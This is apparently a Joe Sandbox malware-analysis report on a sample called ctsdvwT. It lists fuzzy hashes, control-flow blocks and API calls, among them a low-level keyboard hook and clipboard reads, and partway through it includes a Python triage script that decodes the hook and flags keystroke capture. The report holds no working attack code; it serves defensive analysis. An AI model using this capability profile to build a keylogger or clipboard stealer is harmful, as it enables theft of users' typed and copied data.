                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID: s,s#
                                        • API String ID: 2559412058-3488363693
                                        • Opcode ID: bb7c10f17fbf86ade3a087991406cb6ce444b3702f0feb000ba564107f08fc68
                                        • Instruction ID: 73c13790e3dda68fc43683504fce5d681238d31f30d72abf49db58f6d7f1f730
                                        • Opcode Fuzzy Hash: bb7c10f17fbf86ade3a087991406cb6ce444b3702f0feb000ba564107f08fc68
                                        • Instruction Fuzzy Hash: 3C2127B5D046499FDB14DF9AD884BEEFBF5FB88310F108429E419A7250C775AA40CFA0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c60aaa0352ac09afea63245eb9330c4aa74df7671b43d9ae7e658f7245885e74
                                        • Instruction ID: 94a84de9ed15488e22e559f929b39f5e43fe0f07e58c0447d97abc14ec0f9448
                                        • Opcode Fuzzy Hash: c60aaa0352ac09afea63245eb9330c4aa74df7671b43d9ae7e658f7245885e74
                                        • Instruction Fuzzy Hash: 6A631E31D10B1A8ADB51EF68C8846A9F7B1FF99300F11D79AD45877221EB70AAD4CF81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: 8d7ba2ae39569e935ed6081140211b2c2be7b9f1b9e47b9f725bf04dbcbed23c
                                        • Instruction ID: 4d481b040d42667261e4dc87d2763c51e4e1e805ee89fe72f6b6c6604f2a7170
                                        • Opcode Fuzzy Hash: 8d7ba2ae39569e935ed6081140211b2c2be7b9f1b9e47b9f725bf04dbcbed23c
                                        • Instruction Fuzzy Hash: 15B18C71E00209CFEF54CFA9C88179EBBF2AF88314F148129DA15E7794EB749881CB80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: 87cef4c9f048777e7113ebdf9f82997b902c2f66d4d791cd5f9dc3616f97cba8
                                        • Instruction ID: f047a3dad5a957af1a14543d87f35c6487294a95ea59b218c39247a2ebd6f925
                                        • Opcode Fuzzy Hash: 87cef4c9f048777e7113ebdf9f82997b902c2f66d4d791cd5f9dc3616f97cba8
                                        • Instruction Fuzzy Hash: 1D917970E00249DFDF54DFA9C9817AEBBF2AF88304F148129E614E7794EB749885CB85
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31514e40c42596a6b69067337d78eeecc4477afcbd751644f95755af1f581544
                                        • Instruction ID: 589068a24735d0a6f60ff809c91cbb9f484d1fc410ce3cabb0a8426d14fb4bbf
                                        • Opcode Fuzzy Hash: 31514e40c42596a6b69067337d78eeecc4477afcbd751644f95755af1f581544
                                        • Instruction Fuzzy Hash: 63333031D107198EDB11EF68C8846ADF7B1FF99300F15C79AE558A7221EB70AAC5CB81
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4903b5bb2fc21874695365583b539a0bda074c1b1bcc4638eb6296e0c6b982d8
                                        • Instruction ID: 45d9f5b301b8c267b827100eb510847a7c5ddc5f2160ec82088949ba407ace4a
                                        • Opcode Fuzzy Hash: 4903b5bb2fc21874695365583b539a0bda074c1b1bcc4638eb6296e0c6b982d8
                                        • Instruction Fuzzy Hash: 0D327A75A012058FDF54DFA8D984BADBBB2FB88310F148569EA06EB395DB31DC41CB90

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 0: 5c6892d-5c6892f; 1: 5c68965-5c689de; 2: 5c68931-5c68958 (call 5c66c0c); 4: 5c689e0-5c689e6; 5: 5c689e9-5c689f0; 6: 5c6895d-5c6895e; 7: 5c689f2-5c689f8; 8: 5c689fb-5c68a9a (CreateWindowExW); 10: 5c68aa3-5c68adb; 11: 5c68a9c-5c68aa2; 15: 5c68add-5c68ae0; 16: 5c68ae8; 17: 5c68ae9
                                         • Edges: 0->1, 0->2, 1->4, 1->5, 2->6, 4->5, 5->7, 5->8, 7->8, 8->10, 8->11, 10->15, 10->16, 11->10, 15->16, 16->17, 17->17
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C68A8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID: s,s#$s,s#
                                        • API String ID: 716092398-128926716
                                        • Opcode ID: dc1172fa9bedfea33d33b861c9f1f7f90045f2ef075876b71239c5bb554c886d
                                        • Instruction ID: bd1403551983e45771126bb6ec2c3bc2b8bf3ac282cb6d76e2c2f9c6665a7ca8
                                        • Opcode Fuzzy Hash: dc1172fa9bedfea33d33b861c9f1f7f90045f2ef075876b71239c5bb554c886d
                                        • Instruction Fuzzy Hash: 4F51EFB5C00249EFDF15CF99C884ADDBFB2BF48310F24856AE918AB221D7719995CF90

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 18: 5c6896e-5c689de; 19: 5c689e0-5c689e6; 20: 5c689e9-5c689f0; 21: 5c689f2-5c689f8; 22: 5c689fb-5c68a33; 23: 5c68a3b-5c68a9a (CreateWindowExW); 24: 5c68aa3-5c68adb; 25: 5c68a9c-5c68aa2; 29: 5c68add-5c68ae0; 30: 5c68ae8; 31: 5c68ae9
                                         • Edges: 18->19, 18->20, 19->20, 20->21, 20->22, 21->22, 22->23, 23->24, 23->25, 24->29, 24->30, 25->24, 29->30, 30->31, 31->31
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C68A8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID: s,s#$s,s#
                                        • API String ID: 716092398-128926716
                                        • Opcode ID: e094002ffa48d540bd6171de2538b752234a01760f7ecd6ef0fcc1806b9fcd22
                                        • Instruction ID: 6fe940da5c47f103a6a4b5953b9b27df2b50d5415f5da173217dadabf28315f6
                                        • Opcode Fuzzy Hash: e094002ffa48d540bd6171de2538b752234a01760f7ecd6ef0fcc1806b9fcd22
                                        • Instruction Fuzzy Hash: FD51C0B5D10349DFDB14CF9AC884ADEBBF1BF48310F24852AE819AB211D7759985CF90

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 32: 5c68978-5c689de; 33: 5c689e0-5c689e6; 34: 5c689e9-5c689f0; 35: 5c689f2-5c689f8; 36: 5c689fb-5c68a33; 37: 5c68a3b-5c68a9a (CreateWindowExW); 38: 5c68aa3-5c68adb; 39: 5c68a9c-5c68aa2; 43: 5c68add-5c68ae0; 44: 5c68ae8; 45: 5c68ae9
                                         • Edges: 32->33, 32->34, 33->34, 34->35, 34->36, 35->36, 36->37, 37->38, 37->39, 38->43, 38->44, 39->38, 43->44, 44->45, 45->45
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C68A8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID: s,s#$s,s#
                                        • API String ID: 716092398-128926716
                                        • Opcode ID: fdab8e09d481665c3d9480803216b1efe28972ee030457510ae8f6b2eb5b0807
                                        • Instruction ID: 9349d98ea79c1dadbe1f07c0d2687a3ecd0bac03bbe52bbe7e1793d206c27de7
                                        • Opcode Fuzzy Hash: fdab8e09d481665c3d9480803216b1efe28972ee030457510ae8f6b2eb5b0807
                                        • Instruction Fuzzy Hash: A941CEB1D00349DFDB14CFAAC884ADEBBF5BF48310F24862AE819AB210D7759945CF90

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 46: 5c65e4c-5c67910; 48: 5c67912-5c67915; 49: 5c67918-5c67943 (GetModuleHandleW); 50: 5c67945-5c6794b; 51: 5c6794c-5c67960
                                         • Edges: 46->48, 46->49, 48->49, 49->50, 49->51, 50->51
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05C67936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID: s,s#$s,s#
                                        • API String ID: 4139908857-128926716
                                        • Opcode ID: 35b575b0cea4a5252d59d4ca972fca29426ac5a3ffa7ac45ea2b3eccc77df3c8
                                        • Instruction ID: a1b159d3f320f5d70c5127284fd77cc35399650f8c7fc79807e8211be485459f
                                        • Opcode Fuzzy Hash: 35b575b0cea4a5252d59d4ca972fca29426ac5a3ffa7ac45ea2b3eccc77df3c8
                                        • Instruction Fuzzy Hash: D71132B1C006498FDB14CF9AC484B9EFBF4EF49224F10882AD419B7300D375A605CFA0

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 53: 5c678ca-5c67910; 55: 5c67912-5c67915; 56: 5c67918-5c67943 (GetModuleHandleW); 57: 5c67945-5c6794b; 58: 5c6794c-5c67960
                                         • Edges: 53->55, 53->56, 55->56, 56->57, 56->58, 57->58
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05C67936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID: s,s#$s,s#
                                        • API String ID: 4139908857-128926716
                                        • Opcode ID: 574b81ed2328d90b1f0587c9abd3fc17ee7e4bfa473f28d09b18dc9ccbc1c0ba
                                        • Instruction ID: f956c134887f412d5a653751bd92d48de10db7c12a64201476f5b3b9a29384fc
                                        • Opcode Fuzzy Hash: 574b81ed2328d90b1f0587c9abd3fc17ee7e4bfa473f28d09b18dc9ccbc1c0ba
                                        • Instruction Fuzzy Hash: 90110FB6C006498FDB14CF9AD884BDEFBF4EB88324F10881AD429A7210D375A645CFA1

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 96: 5c6c28c-5c6d5a4; 99: 5c6d654-5c6d674 (call 5c66c34); 100: 5c6d5aa-5c6d5af; 102: 5c6d602-5c6d63a (CallWindowProcW); 103: 5c6d5b1-5c6d5e8; 104: 5c6d643-5c6d652; 105: 5c6d63c-5c6d642; 107: 5c6d677-5c6d684; 110: 5c6d5f1-5c6d600; 111: 5c6d5ea-5c6d5f0
                                         • Edges: 96->99, 96->100, 99->107, 100->102, 100->103, 102->104, 102->105, 103->110, 103->111, 104->107, 105->104, 110->107, 111->110
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05C6D629
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID: s,s#
                                        • API String ID: 2714655100-3488363693
                                        • Opcode ID: 1dc99501e2bca4d0970dddd3daa53e5969a56f09b48c0f673482762da491a7bf
                                        • Instruction ID: 2582d0faa278a038036bf5fb5e8edc485a00215faa75775eb7d85af523bf81b0
                                        • Opcode Fuzzy Hash: 1dc99501e2bca4d0970dddd3daa53e5969a56f09b48c0f673482762da491a7bf
                                        • Instruction Fuzzy Hash: 474129B4A003498FDB14CF99C488AAABBF5FF88314F248859D51AA7321D375E941CFA0

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 113: 5c6dca0-5c6e350 (OleGetClipboard); 116: 5c6e352-5c6e358; 117: 5c6e359-5c6e3a7; 122: 5c6e3b7; 123: 5c6e3a9-5c6e3ad; 124: 5c6e3af; 125: 5c6e3b8
                                         • Edges: 113->116, 113->117, 116->117, 117->122, 117->123, 122->125, 123->122, 123->124, 124->122, 125->125
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID: s,s#
                                        • API String ID: 220874293-3488363693
                                        • Opcode ID: aee143083b4c7e143996b14a68ce91c6969e672d331b14954447d969ee83e09b
                                        • Instruction ID: 4c2c0199ae7a9dc0fc44d7804687a84d2ff445ac53554b79e04cff5be46d6e81
                                        • Opcode Fuzzy Hash: aee143083b4c7e143996b14a68ce91c6969e672d331b14954447d969ee83e09b
                                        • Instruction Fuzzy Hash: A1311FB4D01249DFEB14DF99C884B8EBBF5AF48304F20842AE404BB390D7B4AA45CB95

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 126: 5c6e2ac-5c6e308; 128: 5c6e312-5c6e350 (OleGetClipboard); 129: 5c6e352-5c6e358; 130: 5c6e359-5c6e3a7; 135: 5c6e3b7; 136: 5c6e3a9-5c6e3ad; 137: 5c6e3af; 138: 5c6e3b8
                                         • Edges: 126->128, 128->129, 128->130, 129->130, 130->135, 130->136, 135->138, 136->135, 136->137, 137->135, 138->138
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID: s,s#
                                        • API String ID: 220874293-3488363693
                                        • Opcode ID: 86c9ebb063a8a122be519e3b602ac0017a0632a15b8f2e876115ee6b2c75ad82
                                        • Instruction ID: 268700d496000ccd3d35e79611608167d821c4f34ecb859e64f14efa563d810b
                                        • Opcode Fuzzy Hash: 86c9ebb063a8a122be519e3b602ac0017a0632a15b8f2e876115ee6b2c75ad82
                                        • Instruction Fuzzy Hash: B73101B4D01248DFDB14DF99C984B9EBBF5BF48304F24842AE004AB390DBB4A945CFA5

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 139: 5c6c6d0-5c6c76c (DuplicateHandle); 140: 5c6c775-5c6c792; 141: 5c6c76e-5c6c774
                                         • Edges: 139->140, 139->141, 141->140
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C6C75F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID: s,s#
                                        • API String ID: 3793708945-3488363693
                                        • Opcode ID: de65de820b086da7adf1faca7f0ddeed40b02c1a5953019303a626100ae79924
                                        • Instruction ID: c42c14a13293d29c91c81ffe2fab37b2db288ea11956397336cb1df5ad976bae
                                        • Opcode Fuzzy Hash: de65de820b086da7adf1faca7f0ddeed40b02c1a5953019303a626100ae79924
                                        • Instruction Fuzzy Hash: 7321E0B5901249EFDB10CFAAD984AEEBBF5FB48310F14841AE958A3250D374AA41CF61

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 144: 5c6c6d8-5c6c76c (DuplicateHandle); 145: 5c6c775-5c6c792; 146: 5c6c76e-5c6c774
                                         • Edges: 144->145, 144->146, 146->145
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C6C75F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID: s,s#
                                        • API String ID: 3793708945-3488363693
                                        • Opcode ID: 83bf331e12d344fdb5d1e67199b663870c05459a64c3c50f9deaca5f860d2109
                                        • Instruction ID: 0de76f811fa64f4c948fe392b463dbb55445d53c7356d37977a81c172119c4c0
                                        • Opcode Fuzzy Hash: 83bf331e12d344fdb5d1e67199b663870c05459a64c3c50f9deaca5f860d2109
                                        • Instruction Fuzzy Hash: 4521E4B5900249EFDB10CFAAD484ADEBBF4FB48310F14841AE914A3310D374A940CFA5

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 159: 5c6fe03-5c6fe52; 162: 5c6fe54-5c6fe5c; 163: 5c6fe5e-5c6fe90 (SetWindowsHookExA); 164: 5c6fe92-5c6fe98; 165: 5c6fe99-5c6feb9
                                         • Edges: 159->162, 159->163, 162->163, 163->164, 163->165, 164->165
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,05C6FC70,00000000,00000000), ref: 05C6FE83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID: s,s#
                                        • API String ID: 2559412058-3488363693
                                        • Opcode ID: 3fde9c5d0b4a84fbbe215a721cd4b8c28afad2675a8780149970f3862ca3d7c2
                                        • Instruction ID: 241be29509e800b2c857222336662699c3967fb756f6f39a6a6b96fd747dc5ea
                                        • Opcode Fuzzy Hash: 3fde9c5d0b4a84fbbe215a721cd4b8c28afad2675a8780149970f3862ca3d7c2
                                        • Instruction Fuzzy Hash: F32138B5D002499FDB14DF9AD844BEEFBF5FB88310F148419E419A7250C775AA40CFA0
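The SetWindowsHookExA entry above passes idHook = 0000000D, which is WH_KEYBOARD_LL (13 in WinUser.h), the low-level keyboard hook behind the "Installs a global keyboard hook" signature. As an added triage example (editor's code, not Joe Sandbox's and not code from the analysed sample), the script below parses API reference lines and control_flow_graph text in the format this report prints, decodes the idHook argument of SetWindowsHookEx* calls, and lists the capabilities the listing supports. The sample input is copied from the entries in this section (OleGetClipboard is taken from a control_flow_graph line because it has no "APIs" entry); the capability table is the example's own assumption, not a Joe Sandbox signature.

```python
"""Triage helper for Joe Sandbox disassembly listings (editor-added example)."""
import re

# Constructed sample: lines copied from the report section above. OleGetClipboard
# appears only as a block annotation in a control_flow_graph line, so one such
# line is included too.
SAMPLE = """
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C68A8A
• GetModuleHandleW.KERNELBASE(00000000), ref: 05C67936
• CallWindowProcW.USER32(?,?,?,?,?), ref: 05C6D629
control_flow_graph 113 5c6dca0-5c6e350 OleGetClipboard 116 5c6e352-5c6e358 113->116
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C6C75F
• SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,05C6FC70,00000000,00000000), ref: 05C6FE83
• OleInitialize.OLE32(00000000), ref: 05C6E1C5
• KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05C6D875), ref: 05C6D8FF
"""

# "Api.MODULE(arg,arg,...), ref: ADDR" as the report prints it.
API_LINE = re.compile(
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# A basic block annotated with an API name, e.g. "5c6dca0-5c6e350 OleGetClipboard".
CFG_BLOCK_API = re.compile(r"\b[0-9a-f]{5,8}(?:-[0-9a-f]{5,8})?\s+([A-Z][A-Za-z0-9]+)\b")

# idHook values from WinUser.h.
WH_NAMES = {
    -1: "WH_MSGFILTER", 0: "WH_JOURNALRECORD", 1: "WH_JOURNALPLAYBACK",
    2: "WH_KEYBOARD", 3: "WH_GETMESSAGE", 4: "WH_CALLWNDPROC", 5: "WH_CBT",
    6: "WH_SYSMSGFILTER", 7: "WH_MOUSE", 9: "WH_DEBUG", 10: "WH_SHELL",
    11: "WH_FOREGROUNDIDLE", 12: "WH_CALLWNDPROCRET", 13: "WH_KEYBOARD_LL",
    14: "WH_MOUSE_LL",
}

# Editor's triage table (an assumption of this example, not a Joe Sandbox signature).
CAPABILITIES = {
    "SetWindowsHookExA": "installs a Windows hook (see decoded idHook)",
    "SetWindowsHookExW": "installs a Windows hook (see decoded idHook)",
    "OleGetClipboard": "reads clipboard contents",
    "OleInitialize": "initialises OLE, a prerequisite for OleGetClipboard",
    "DuplicateHandle": "duplicates a kernel handle",
    "CreateWindowExW": "creates a window",
    "CallWindowProcW": "calls a window procedure (window subclassing)",
}


def parse_arg(token):
    """Hex argument -> signed 32-bit int; '?' (unknown to the sandbox) -> None."""
    token = token.strip()
    if not re.fullmatch(r"[0-9A-Fa-f]{1,8}", token):
        return None
    value = int(token, 16)
    return value - (1 << 32) if value >= (1 << 31) else value


def parse_api_lines(text):
    """Return one dict per 'Api.MODULE(...), ref: ADDR' entry, in listing order."""
    calls = []
    for m in API_LINE.finditer(text):
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def parse_cfg_apis(text):
    """API names attached to basic blocks in control_flow_graph lines."""
    names = []
    for line in text.splitlines():
        if line.strip().startswith("control_flow_graph"):
            names.extend(CFG_BLOCK_API.findall(line))
    return names


def hook_name(call):
    """Decode idHook of a SetWindowsHookEx* call; None if not a hook call or unknown."""
    if not call["api"].startswith("SetWindowsHookEx") or not call["args"]:
        return None
    id_hook = call["args"][0]
    if id_hook is None:
        return None
    return WH_NAMES.get(id_hook, f"unknown({id_hook})")


def triage(text):
    """Summarise APIs seen, decoded hooks and the capabilities they imply."""
    calls = parse_api_lines(text)
    apis = sorted({c["api"] for c in calls} | set(parse_cfg_apis(text)))
    hooks = [h for h in (hook_name(c) for c in calls) if h]
    findings = [CAPABILITIES[a] for a in apis if a in CAPABILITIES]
    if any(h in ("WH_KEYBOARD", "WH_KEYBOARD_LL") for h in hooks):
        findings.append("keyboard hook installed: keystroke capture")
    return {"apis": apis, "hooks": hooks, "findings": findings}


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

Run it against the text of any such report section; arguments the sandbox could not recover are printed as "?" and come back as None, so only the hook id that is actually present (0x0D here) is decoded, and the hook is flagged as keystroke capture only for WH_KEYBOARD or WH_KEYBOARD_LL.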

                                         Control-flow Graph (graph image not reproduced; basic blocks listed as index: address range, edges as from->to)
                                         • Blocks: 169: 5c6db88-5c6db93; 170: 5c6e170-5c6e1d2 (OleInitialize); 171: 5c6e1d4-5c6e1da; 172: 5c6e1db-5c6e1f8
                                         • Edges: 169->170, 170->171, 170->172, 171->172
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 05C6E1C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID: s,s#
                                        • API String ID: 2538663250-3488363693
                                        • Opcode ID: 97a6a77ea184a8da6017a7b418320425e072190f31fcaea9f93fd8e7a571b54a
                                        • Instruction ID: ff0ba0d24f3846bf98ea6354b662579ec28dd706ffa9a5ee8c88402d74b5121e
                                        • Opcode Fuzzy Hash: 97a6a77ea184a8da6017a7b418320425e072190f31fcaea9f93fd8e7a571b54a
                                        • Instruction Fuzzy Hash: 201145B5800349CFCB20CF9AC485BDFBBF8EB48210F20885AD519A7700D379A644CFA5
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05C6D875), ref: 05C6D8FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID: s,s#
                                        • API String ID: 2492992576-3488363693
                                        • Opcode ID: 0b0cf9c36757702386a5e573853659f82cb59e63c43c445d21faaa17ec8476f9
                                        • Instruction ID: 6834a5d9409fe92cbe32ddd57f87b32a69b7293480590890f3ce22ad00a3a146
                                        • Opcode Fuzzy Hash: 0b0cf9c36757702386a5e573853659f82cb59e63c43c445d21faaa17ec8476f9
                                        • Instruction Fuzzy Hash: 291145B59047498FCB20DF9AD484BDEFBF4EB49314F208459D51AA3210C775AA40CFE4
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 05C6E1C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID: s,s#
                                        • API String ID: 2538663250-3488363693
                                        • Opcode ID: 2b959b91c0c9d10df731626affd9a096e2fccf3bc59914cdc763590e5efbbabe
                                        • Instruction ID: 1ee507a807ed6729562ecdac0fc9096daa135f71af3f8b1ba8c69b2f7c027012
                                        • Opcode Fuzzy Hash: 2b959b91c0c9d10df731626affd9a096e2fccf3bc59914cdc763590e5efbbabe
                                        • Instruction Fuzzy Hash: B71145B4800749CFDB20DFAAC484BDEBBF8EB48214F10885AE519B7300D375A940CFA4
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 05C6E1C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID: s,s#
                                        • API String ID: 2538663250-3488363693
                                        • Opcode ID: eccfb521a82d5a1f27bd1ab10a03b041e7a7e71caeb7191ce369a789b823a61d
                                        • Instruction ID: cdb066f5b541d6b64359267682adb5abf7fa8b82b2a217057d7ee3cf62d4554d
                                        • Opcode Fuzzy Hash: eccfb521a82d5a1f27bd1ab10a03b041e7a7e71caeb7191ce369a789b823a61d
                                        • Instruction Fuzzy Hash: 261115B5800789CFDB10DF9AD484BDEBBF8EB48614F10885AD519A7700D379A544CFA5
                                        APIs
